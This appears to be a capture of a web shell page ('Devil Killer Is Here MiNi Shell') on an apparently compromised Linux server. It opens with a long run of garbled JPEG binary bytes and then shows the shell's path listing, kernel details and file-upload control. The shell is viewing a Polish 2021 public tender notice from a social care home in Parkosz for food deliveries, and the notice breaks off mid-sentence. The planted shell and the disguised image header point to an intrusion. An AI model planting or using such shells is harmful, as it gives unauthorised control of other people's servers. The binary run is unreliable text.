JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211112/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211112/0026654201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH DO DOMU POMOCY SPOŁECZNEJ W PARKOSZU </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">DOM POMOCY SPOŁECZNEJ W PARKOSZU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 850281239</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">26</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Parkosz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">39-220</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL824 - Tarnobrzeski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">14 672 14 56</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">14 672 14 56</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@dpsparkosz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.dpsparkosz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH DO DOMU POMOCY SPOŁECZNEJ W PARKOSZU </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8bfc9aff-4313-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00266542</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001629/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa artykułów spożywczych do Domu Pomocy Społecznej w Parkoszu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-8bfc9aff-4313-11ec-8c2d-66c2f1230e9c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.dpsparkosz.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wniosków o dopuszczenie do udziału w postępowaniu, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w Pzp, odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (t. j. Dz. U. z 2020 r. poz. 344). <br/>2.	Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 Pzp, podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. Ofertę, a także oświadczenie o jakim mowa w Rozdziale IX ust. 1 SWZ składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <br/>3.	Zgodnie z 67 ustawy Pzp, Zamawiający podaje wymagania techniczne związane z korzystaniem z miniPortalu: Wymagania techniczne i organizacyjne, opisane zostały w Regulaminie korzystania z miniPortalu dostępnym pod adresem https://miniportal.uzp.gov.pl/WarunkiUslugi.aspx.<br/>4.	Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje się korzystając z miniPortalu przestrzegać postanowień tego regulaminu.<br/>5.	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do złożenia i wycofania oferty oraz do komunikacji wynosi 150MB.<br/>6.	Zamawiający może również komunikować się z Wykonawcami (inna niż oferta Wykonawcy i załączniki do oferty) za pomocą poczty elektronicznej, email: sekretariat@dpsparkosz.pl.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych, zw. dalej RODO) oraz art. 19 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U., poz. 2019 ze zm.), zw. dalej Pzp informujemy, że:<br/><br/>1.	Administratorem danych osobowych jest Dom Pomocy Społecznej w Parkoszu, Parkosz 26, 39-220 Pilzno e-mail: sekretariat@dpsparkosz.pl, który przetwarza dane osobowe zebrane w postępowaniu o udzielenie zamówienia w sposób gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem.<br/>2.	Kontakt do Inspektora ochrony danych e-mail: inspektor.odo@onet.pl.<br/>3.	Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem prowadzonym w trybie podstawowym bez negocjacji (art. 275 pkt 1 Pzp).<br/>4.	Odbiorcami danych osobowych mogą być osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy Pzp, podmioty usług IT u Administratora, organy kontroli. <br/>5.	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp. przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia.<br/>6.	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>7.	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>8.	Posiada Pani/Pan:<br/>1)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia – art. 75 Pzp); <br/>2)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników – art. 76 Pzp); <br/>3)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego); <br/>4)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych ul. Stawki 2, 00-193 Warszawa, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>9.	Nie przysługuje Pani/Panu:<br/>1)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>2)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>3)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">K-271-2-12/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 195894,533 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa artykułów spożywczych do Domu Pomocy Społecznej w Parkoszu. <br/>1.1.Przedmiot zamówienia obejmuje sprzedaż wraz z dostarczeniem przez Wykonawcę własnym transportem, artykułów spożywczych do siedziby Zamawiającego, po uprzednim zamówieniu. Zamówienie będzie składane z 1 dniowym wyprzedzeniem przed ustalonym terminem dostawy, mailowo, faksem, telefonicznie lub pisemnie z podaniem ilości oraz rodzaju asortymentu.<br/>1.2.Po dostarczeniu zamówionego towaru Wykonawca jest zobowiązany do rozładowania i wniesienia towaru go do magazynu DPS. Wykonawca zobowiązuje się przekazać towar bezpośrednio osobie uprawnionej do odbioru i kontroli ilościowej i jakościowej. Nie dopuszcza się pozostawiania dostaw przez Wykonawcę osobom nieuprawnionym.<br/>1.3.Koszt transportu i ryzyko ponosi Wykonawca i jest wliczony w cenę zamówienia. <br/>1.4.Dostawa ma odbywać się w godzinach wyznaczanych przez Zamawiającego. Zamówienia będą realizowane sukcesywnie, według potrzeb Zamawiającego. <br/>1.5.Po dokonanym zamówieniu, Wykonawca zobowiązany jest potwierdzić otrzymane zamówienie. <br/>1.6. Zamówiony asortyment musi być najlepszej jakości, wyprodukowany zgodnie z obowiązującymi w tym zakresie normami i przepisami prawa, świeży i nieprzeterminowany. Na każdym opakowaniu powinna znajdować się data minimalnej trwałości lub termin przydatności do spożycia oraz etykieta z występującymi alergenami. Artykuły muszą mieć jak najdłuższy okres przydatności do spożycia. Niedopuszczalne jest dostarczanie towaru z krótką datą przydatności do spożycia, mniej niż 30% czasu licząc od daty produkcji towaru do końcowej daty jego przydatności do spożycia.<br/>1.7.Artykuły spożywcze muszą być składowane i transportowane w sposób zapewniający utrzymanie ich we właściwej jakości handlowej. Artykuły spożywcze muszą być dostarczone przez Wykonawcę transportem, przy zachowaniu odpowiednich warunków higieniczno - sanitarnych, zgodnie z obowiązującymi przepisami prawa, gwarantującymi utrzymanie odpowiedniej temperatury oraz jakości przewożonych artykułów. <br/>1.8.Na każde żądanie Zamawiającego, Wykonawca zobowiązany jest okazać w stosunku do każdego produktu odpowiedni certyfikat zgodności z Polską Normą lub normami europejskim itp. <br/>1.9.Wykonawca zobowiązany jest przestrzegać zalecenia Głównego Inspektora Sanitarnego oraz właściwych ministerstw na czas pandemii COVID-19 w zakresie realizacji przedmiotu zamówienia. <br/>1.10. W przypadku stwierdzenia braków ilościowych w zamówionym towarze, Wykonawca zobowiązuje się uzupełnić towar tego samego dnia dostawy do godz. 1400, bez prawa naliczania jakichkolwiek dodatkowych opłat. Jeżeli brakujący towar nie zostanie dostarczony w tym samym dniu, Wykonawca będzie zobowiązany wystawić fakturę korygującą na wartości dostarczonego towaru. <br/>1.11.W przypadku dostarczenia większej ilości towaru niż zamawiana, Zamawiający ma prawo odmówić przyjęcia nadwyżki oraz domagać się wystawienia faktury korygującej.<br/>1.12.W trakcie realizacji przedmiotu zamówienia Zamawiający zastrzega sobie prawo do zmniejszenia lub zwiększenia zamówienia w zależności od istniejących potrzeb, których aktualnie nie jest w stanie przewidzieć. Poszczególne ilości asortymentów są wielkościami orientacyjnymi. Zwiększenie lub zmniejszenie zakresu ilościowego przedmiotu zamówienia w każdej części może nastąpić maksymalnie o 30% przy czym Wykonawcy nie przysługują w tym zakresie żadne roszczenia wobec Zamawiającego.<br/>1.13.Przedmiot zamówienia jest tożsamy dla wszystkich części z wyłączeniem ust. 2.<br/>2.	Szczegółowy opis przedmiotu zamówienia: Wykonawca zobowiązany jest do wykonania przedmiotu zamówienia, opisanego szczegółowo formularzu cenowym, stanowiącym załącznik nr 2 do SWZ dot. części od I do VII. Zgodnie z art. 99 ust. 5 Pzp, Zamawiający dopuszcza rozwiązania równoważne opisywanym artykułom: Wykonawca musi wykazać równoważność oferowanego przedmiotu zamówienia poprzez wskazanie w opisie rozwiązania równoważnego na podstawie zawartych w opisie przedmiotu zamówienia kryteriów oceny równoważności (opis oraz minimalny skład zamawianego towaru). Zamawiający dopuszcza zaproponowanie towarów w opakowaniach o innych lecz zbliżonych wielkościach/gramaturach (do +/- 5%) od określonych w Załączniku nr 2 do SWZ parametrów jednostki miary.<br/> Cz. I – Artykuły Ogólnospożywcze: sukcesywna dostawa artykułów spożywczych, dwa razy w tygodniu w godzinach od 7:00 do 11:00 zgodnie z zamówieniem Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15400000-2 - Oleje i tłuszcze zwierzęce lub roślinne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1)	Kryterium – Cena brutto (C) – waga 60pkt.<br/><br/>Liczona według wzoru:<br/>C=(CN brutto/CO brutto)x60pkt.<br/>Gdzie: C- Wartość punktowa ceny,<br/> CN brutto – Najniższa oferowana cena brutto,<br/> CO brutto – Cena oferty ocenianej brutto.<br/>2)	Kryterium – Dostawa towaru po uwzględnionej reklamacji (Dr) – waga max. 40pkt. Będzie oceniane na podstawie złożonego oświadczenia w formularzu ofertowym, zgodnie z załącznikiem nr 1 do SWZ. Niezaznaczenie czasu dostawy towaru po uwzględnionej reklamacji, będzie oznaczało przyznanie 0 pkt. Zamawiający będzie oceniał czas dostawy towaru po uwzględnionej reklamacji w następujący sposób:<br/>a)	dostawa towaru w terminie 1 dnia kalendarzowego od daty uwzględnionej reklamacji - 40pkt.<br/>b)	dostawa towaru w terminie 2 dni kalendarzowych od daty uwzględnionej reklamacji - 30pkt.<br/>c)	dostawa towaru w terminie 3 dni kalendarzowych od daty uwzględnionej reklamacji - 20pkt.<br/>d)	dostawa towaru w terminie 4 dni kalendarzowych od daty uwzględnionej reklamacji - 10pkt.<br/>e)	dostawa towaru w terminie powyżej 4 dni kalendarzowych od daty uwzględnionej reklamacji - 0 pkt.<br/><br/>2.	Ocena ofert będzie ostatecznie wyliczana według wzoru: OCENA = C + Dr.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dostawa towaru po uwzględnionej reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa artykułów spożywczych do Domu Pomocy Społecznej w Parkoszu. <br/>1.1.Przedmiot zamówienia obejmuje sprzedaż wraz z dostarczeniem przez Wykonawcę własnym transportem, artykułów spożywczych do siedziby Zamawiającego, po uprzednim zamówieniu. Zamówienie będzie składane z 1 dniowym wyprzedzeniem przed ustalonym terminem dostawy, mailowo, faksem, telefonicznie lub pisemnie z podaniem ilości oraz rodzaju asortymentu.<br/>1.2.Po dostarczeniu zamówionego towaru Wykonawca jest zobowiązany do rozładowania i wniesienia towaru go do magazynu DPS. Wykonawca zobowiązuje się przekazać towar bezpośrednio osobie uprawnionej do odbioru i kontroli ilościowej i jakościowej. Nie dopuszcza się pozostawiania dostaw przez Wykonawcę osobom nieuprawnionym.<br/>1.3.Koszt transportu i ryzyko ponosi Wykonawca i jest wliczony w cenę zamówienia. <br/>1.4.Dostawa ma odbywać się w godzinach wyznaczanych przez Zamawiającego. Zamówienia będą realizowane sukcesywnie, według potrzeb Zamawiającego. <br/>1.5.Po dokonanym zamówieniu, Wykonawca zobowiązany jest potwierdzić otrzymane zamówienie. <br/>1.6. Zamówiony asortyment musi być najlepszej jakości, wyprodukowany zgodnie z obowiązującymi w tym zakresie normami i przepisami prawa, świeży i nieprzeterminowany. Na każdym opakowaniu powinna znajdować się data minimalnej trwałości lub termin przydatności do spożycia oraz etykieta z występującymi alergenami. Artykuły muszą mieć jak najdłuższy okres przydatności do spożycia. Niedopuszczalne jest dostarczanie towaru z krótką datą przydatności do spożycia, mniej niż 30% czasu licząc od daty produkcji towaru do końcowej daty jego przydatności do spożycia.<br/>1.7.Artykuły spożywcze muszą być składowane i transportowane w sposób zapewniający utrzymanie ich we właściwej jakości handlowej. Artykuły spożywcze muszą być dostarczone przez Wykonawcę transportem, przy zachowaniu odpowiednich warunków higieniczno - sanitarnych, zgodnie z obowiązującymi przepisami prawa, gwarantującymi utrzymanie odpowiedniej temperatury oraz jakości przewożonych artykułów. <br/>1.8.Na każde żądanie Zamawiającego, Wykonawca zobowiązany jest okazać w stosunku do każdego produktu odpowiedni certyfikat zgodności z Polską Normą lub normami europejskim itp. <br/>1.9.Wykonawca zobowiązany jest przestrzegać zalecenia Głównego Inspektora Sanitarnego oraz właściwych ministerstw na czas pandemii COVID-19 w zakresie realizacji przedmiotu zamówienia. <br/>1.10. W przypadku stwierdzenia braków ilościowych w zamówionym towarze, Wykonawca zobowiązuje się uzupełnić towar tego samego dnia dostawy do godz. 1400, bez prawa naliczania jakichkolwiek dodatkowych opłat. Jeżeli brakujący towar nie zostanie dostarczony w tym samym dniu, Wykonawca będzie zobowiązany wystawić fakturę korygującą na wartości dostarczonego towaru. <br/>1.11.W przypadku dostarczenia większej ilości towaru niż zamawiana, Zamawiający ma prawo odmówić przyjęcia nadwyżki oraz domagać się wystawienia faktury korygującej.<br/>1.12.W trakcie realizacji przedmiotu zamówienia Zamawiający zastrzega sobie prawo do zmniejszenia lub zwiększenia zamówienia w zależności od istniejących potrzeb, których aktualnie nie jest w stanie przewidzieć. Poszczególne ilości asortymentów są wielkościami orientacyjnymi. Zwiększenie lub zmniejszenie zakresu ilościowego przedmiotu zamówienia w każdej części może nastąpić maksymalnie o 30% przy czym Wykonawcy nie przysługują w tym zakresie żadne roszczenia wobec Zamawiającego.<br/>1.13.Przedmiot zamówienia jest tożsamy dla wszystkich części z wyłączeniem ust. 2.<br/>2.Szczegółowy opis 